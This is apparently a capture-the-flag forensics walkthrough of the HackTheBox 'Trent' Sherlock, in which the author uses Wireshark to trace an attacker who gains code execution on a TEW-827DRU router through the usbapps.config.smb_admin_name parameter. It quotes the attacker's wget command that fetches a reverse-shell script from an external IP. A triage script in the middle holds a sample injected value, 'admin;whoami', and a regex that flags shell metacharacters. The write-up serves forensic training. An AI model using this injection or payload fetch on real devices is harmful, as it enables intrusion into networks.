HackTheBox Sherlock : Trent

Walkthrough Write-Up

أحمد ناصر
4 min read · Feb 10, 2025

Hello 4n6 geeks, this is Ahmed (OxAlpa), and this is a simple write-up about the Trent Sherlock from HTB.

My LinkedIn

LEVEL : medium

Category : Forensics

Sherlock Scenario :

The SOC team has identified suspicious lateral movement targeting router firmware from within the network. Anomalous traffic patterns and command execution have been detected on the router, indicating that an attacker already inside the network has gained unauthorized access and is attempting further exploitation. You will be given network traffic logs from one of the impacted machines. Your task is to conduct a thorough investigation to unravel the attacker’s Techniques, Tactics, and Procedures (TTPs).

Q1-From what IP address did the attacker initially launch their activity?

  • Firstly, load the PCAP file into Wireshark.
  • Now go to Statistics > Conversations > IPv4:
  • As you can see, there is a huge number of packets between the router (192.168.10.1) and the attacker IP (192.168.10.2):
The Answer : 192.168.10.2

Q2-What is the model name of the compromised router?

  • Now use this query to filter the HTTP packets between the router and the attacker machine:
ip.addr==192.168.10.2 && ip.addr==192.168.10.1 && http
  • Now go to packet 13 and follow the TCP stream:
TCP Stream 0
The Answer : TEW-827DRU

Q3-How many failed login attempts did the attacker try before successfully logging into the router?

  • As you know, the authentication is done over HTTP using the POST method.
  • So use this query:
ip.src==192.168.10.2 && ip.dst==192.168.10.1 && http.request.method==POST
  • As shown in the first 3 packets, the attacker tried to log into the router:
  • So the attacker successfully logged into the router after 2 failed attempts, as shown in packet 22826:
The Answer : 2

Q4-At what UTC time did the attacker successfully log into the router's web admin interface?

  • From the question above we know the attacker successfully logged into the router in packet 22826:
The Answer : 2024-05-01 15:53:27

Q5-How many characters long was the password used to log in successfully?

  • From question 3, we know that the attacker managed to log in without a password:
The Answer : 0

Q7-Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?

  • After the attacker logged into the router, he managed to get remote code execution with admin privileges by injecting into the HTTP parameter usbapps.config.smb_admin_name, as shown in packet 59466:
The Answer : usbapps.config.smb_admin_name
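To make the checks from Q3, Q4, Q5 and Q7 repeatable, here is a small triage script I added for this write-up (it is not part of the Sherlock or the router's code). It runs over a constructed sample of login POSTs and form submissions shaped like the traffic described above, counts the failed logins before the first success, reads the password length, and flags any form parameter whose decoded value carries shell metacharacters. The "login_fail" response marker and the URIs are assumptions, not values from the PCAP.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of the router's HTTP traffic (timestamps in UTC). It only mimics
# the shape of what the write-up describes; these are not packets from the Sherlock PCAP.
# Assumption: a response body containing "login_fail" marks a rejected login and any
# other response to the login form marks success. URIs are assumed too.
SAMPLE = [
    {"ts": "2024-05-01 15:52:10", "src": "192.168.10.2", "uri": "/login.cgi",
     "body": "username=admin&password=admin123", "resp": "login_fail"},
    {"ts": "2024-05-01 15:52:41", "src": "192.168.10.2", "uri": "/login.cgi",
     "body": "username=admin&password=password", "resp": "login_fail"},
    {"ts": "2024-05-01 15:53:27", "src": "192.168.10.2", "uri": "/login.cgi",
     "body": "username=admin&password=", "resp": "<html>status page</html>"},
    {"ts": "2024-05-01 16:05:03", "src": "192.168.10.2", "uri": "/apply.cgi",
     "body": "usbapps.config.smb_admin_name=admin%3Bwhoami&action=apply",
     "resp": "<html>ok</html>"},
]

# Shell metacharacters that have no business inside a router form field.
INJECTION_RE = re.compile(r"[;|`$]")


def login_summary(requests, login_uri="/login.cgi"):
    """Return (failed_attempts_before_success, success_ts, password_length), or None."""
    failed = 0
    for r in requests:
        if r["uri"] != login_uri:
            continue
        if "login_fail" in r["resp"]:
            failed += 1
            continue
        # First non-failing login POST: decode the form and measure the password.
        pw = parse_qs(r["body"], keep_blank_values=True).get("password", [""])[0]
        return failed, r["ts"], len(pw)
    return None


def injected_parameters(requests):
    """Flag (timestamp, parameter, decoded value) where the value looks like injection."""
    hits = []
    for r in requests:
        for name, values in parse_qs(r["body"], keep_blank_values=True).items():
            for v in values:
                if INJECTION_RE.search(v):
                    hits.append((r["ts"], name, v))
    return hits


if __name__ == "__main__":
    print(login_summary(SAMPLE))  # (2, '2024-05-01 15:53:27', 0)
    for ts, name, value in injected_parameters(SAMPLE):
        print(f"{ts} suspicious value in {name!r}: {value!r}")
```

Against a real capture, feed the same dict shape from `tshark -T json` (fields `http.request.uri`, `http.file_data` and the paired response body) instead of SAMPLE.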

Q8-What is the CVE number associated with the vulnerability that was exploited in this attack?

  • Now that we know the attacker got remote code execution and we know the router model, just search for it:
The Answer : CVE-2024-28353

Q6-What is the current firmware version installed on the compromised router?

The Answer : 2.10

Q9-What was the first command the attacker executed by exploiting the vulnerability?

  • Easy one, just go to packet 44975 :
The Answer : Whoami

Q10-What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?

  • Go to packet number 47681:
The Answer : wget http://35.159.25.253:8000/a1l4m.sh

Q11-Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?

  • Now follow the TCP stream:
tcp stream eq 1614
The Answer : Access to this resource is forbidden

The End

Follow For More


Written by أحمد ناصر

CyberSecurity Analyst || DFIR || CTF player
